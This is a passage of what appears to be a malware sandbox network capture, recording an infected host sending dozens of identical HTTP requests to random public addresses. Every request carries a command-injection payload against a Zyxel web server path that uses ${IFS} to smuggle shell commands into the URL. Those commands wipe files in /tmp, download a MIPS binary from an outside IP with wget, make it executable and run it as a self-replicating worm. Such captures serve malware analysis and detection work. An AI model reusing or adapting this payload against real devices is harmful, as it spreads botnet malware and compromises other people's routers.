                                          Jan 14, 2024 15:46:01.709537983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          872192.168.2.234179270.196.146.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709546089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          873192.168.2.234261664.193.91.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709556103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          874192.168.2.2358068123.185.105.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709584951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          875192.168.2.2347446190.255.123.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709625006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          876192.168.2.2334202165.42.33.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709657907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          877192.168.2.236071631.180.98.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709703922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          878192.168.2.235611268.19.91.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709744930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          879192.168.2.2338154132.253.52.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709773064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          880192.168.2.235354446.8.135.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709791899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          881192.168.2.2334774112.145.118.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709827900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          882192.168.2.235451687.7.245.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709862947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          883192.168.2.2359524202.114.228.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709870100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          884192.168.2.2353584201.139.234.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709889889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          885192.168.2.2339582189.240.89.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709899902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          886192.168.2.2341502190.225.113.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709912062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          887192.168.2.2352316135.100.213.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709963083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          888192.168.2.235779214.246.177.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709981918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          889192.168.2.2344052176.25.205.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710001945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          890192.168.2.234061831.117.188.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710014105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          891192.168.2.235292613.3.240.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710051060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          892192.168.2.2346608107.63.131.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710092068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          893192.168.2.2348194189.164.7.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710092068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          894192.168.2.2348160160.230.183.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710123062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          895192.168.2.233597442.117.249.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710131884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          896192.168.2.2344334149.162.179.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710211039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          897192.168.2.235514620.162.128.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710225105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          898192.168.2.2350850219.174.26.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710238934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          899192.168.2.2335686125.156.216.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710253000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          900192.168.2.2346940151.224.140.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710299969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          901192.168.2.235483231.208.120.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710325003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          902192.168.2.2337874167.186.175.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710346937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          903192.168.2.2350992144.141.239.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710377932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          904192.168.2.234009417.16.219.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710396051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          905192.168.2.234961078.52.38.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710432053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          906192.168.2.2359754212.164.231.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710457087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          907192.168.2.2357136128.220.132.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710489988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          908192.168.2.234641852.148.118.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710515022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          909192.168.2.234614446.166.204.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710556984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          910192.168.2.2350516198.190.224.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710578918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          911192.168.2.234440881.182.1.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710638046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          912192.168.2.236076693.168.130.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710638046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          913192.168.2.2343782191.111.124.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710649014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          914192.168.2.235611658.164.21.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710705996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          915192.168.2.2356718111.119.227.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710714102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          916192.168.2.233453646.124.227.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710719109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          917192.168.2.2345542183.133.212.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710755110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          918192.168.2.2337562194.14.4.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710755110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          919192.168.2.235527632.100.204.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710761070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          920192.168.2.2337718150.236.51.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710809946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          921192.168.2.2336850113.21.68.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710829020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          922192.168.2.2356250122.50.100.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710844994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          923192.168.2.235222439.130.46.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.710894108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          924192.168.2.2341330125.143.190.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.712935925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          925192.168.2.2340100164.218.186.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.712984085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          926192.168.2.2348910208.36.183.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713000059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          927192.168.2.2352698168.215.18.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713040113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          928192.168.2.2345210161.0.75.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713701010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          929192.168.2.23595081.59.48.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713728905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          930192.168.2.2358570144.158.223.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713735104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          931192.168.2.234533480.28.78.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713783026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          932192.168.2.2335826144.50.199.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713810921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          933192.168.2.23510661.19.196.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713810921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          934192.168.2.2344990171.82.163.139443
                                          TimestampBytes transferredDirectionData
